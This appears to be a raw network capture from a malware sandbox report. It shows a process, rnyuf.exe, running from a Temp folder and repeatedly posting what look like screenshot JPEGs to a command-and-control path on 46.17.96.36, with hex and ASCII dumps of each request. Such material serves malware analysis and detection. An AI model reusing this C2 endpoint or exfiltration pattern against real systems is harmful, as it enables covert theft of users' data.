                                        Aug 29, 2021 22:27:36.141222954 CEST7415OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:36.175359964 CEST7418OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:36.175395012 CEST7426OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:36.175479889 CEST7440OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:36.208112955 CEST7454OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:36.208163977 CEST7462OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:36.208194017 CEST7475OUTData Raw: 4b 96 37 fe b7 7f e4 64 d4 af 14 b1 47 14 92 45 22 47 32 96 8d 99 48 0e 01 20 90 7b 8c 82 38 ee 2a 2a e9 f5 1d 2f 56 b9 f0 9f 86 2f ed 34 fb a9 6d 6d ed 26 f3 2e 12 06 68 a3 22 e6 43 f3 36 36 8e dd 4d 6d 39 f2 b5 e6 ed f9 99 46 1c c9 99 bf d8 1a
                                        Data Ascii: K7dGE"G2H {8**/V/4mm&.h"C66Mm9F3>e-le|(1q+2yK22! `F@'W}a}ZLCQnt$,e#,0OA-Qn-G?l.Kn,>U cb_2_c
                                        Aug 29, 2021 22:27:36.208429098 CEST7485OUTData Raw: 4a ed e4 67 22 a1 26 6a 7c be b4 86 48 c7 53 58 cd 75 21 ef 51 99 5c f7 a7 c8 68 b0 ef a9 b6 6e a2 5e c2 a3 6d 45 57 a6 2b 1b 24 f7 a3 93 47 22 34 54 12 34 db 54 63 d2 a0 7d 42 43 de a9 d1 4e c9 16 a9 c5 13 35 dc 87 f8 aa 33 2b 9e a4 d3 28 aa b2
                                        Data Ascii: Jg"&j|HSXu!Q\hn^mEW+$G"4T4Tc}BCN53+()E!I>QaNHcMhQIZb%/,~Vfjpv/z+(Q@)-w-%\(RCEP!hPGj(I@Gz-/j
                                        Aug 29, 2021 22:27:36.311410904 CEST7510INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        58192.168.2.44979646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:36.606376886 CEST7511OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:36.606472015 CEST7511OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:36.606647015 CEST7521OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:36.606736898 CEST7524OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:36.639185905 CEST7527OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:36.639317989 CEST7530OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:36.639728069 CEST7549OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:36.672199965 CEST7560OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:36.672267914 CEST7565OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:36.672591925 CEST7597OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:36.675106049 CEST7599OUTData Raw: a8 91 68 ed 46 68 34 c0 29 69 33 46 68 01 68 a4 a5 ed 40 06 69 69 b4 66 80 b0 ea 5c d2 51 9a 68 43 81 a7 67 9a 60 34 ea a2 45 a3 34 99 a3 23 d2 80 1c 0d 2d 33 75 26 73 4e e2 b1 26 7d e9 77 01 51 d1 9a 2e 16 25 dd 4a 09 35 10 34 e0 69 a6 2b 0f cd
                                        Data Ascii: hFh4)i3Fhh@iif\QhCg`4E4#-3u&sN&}wQ.%J54i+(4F8d4I4Z$p4f4i4?4MJ3E?4MqX~hG\p&hj,Z0r-HZ&KGIbG-L&Z1\KeQ^ZHZRBr)Dqj3L
                                        Aug 29, 2021 22:27:36.778872013 CEST7619INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        59192.168.2.44979746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:37.025418997 CEST7619OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:37.025510073 CEST7620OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:37.025722027 CEST7630OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:37.025837898 CEST7632OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:37.057537079 CEST7635OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:37.057596922 CEST7638OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:37.057646036 CEST7641OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:37.057866096 CEST7646OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:37.058026075 CEST7653OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:37.058051109 CEST7655OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:37.058144093 CEST7658OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:37.193850994 CEST7729INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:37 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        6192.168.2.44974146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:10.940207958 CEST1664OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:10.940363884 CEST1665OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:10.940610886 CEST1675OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:10.940781116 CEST1677OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:10.973484993 CEST1683OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:10.973526001 CEST1686OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:10.973877907 CEST1694OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:10.974180937 CEST1703OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:11.006450891 CEST1711OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:11.006526947 CEST1719OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:11.006588936 CEST1724OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:11.110115051 CEST1772INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        60192.168.2.44979846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:37.554042101 CEST7730OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:37.554145098 CEST7730OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
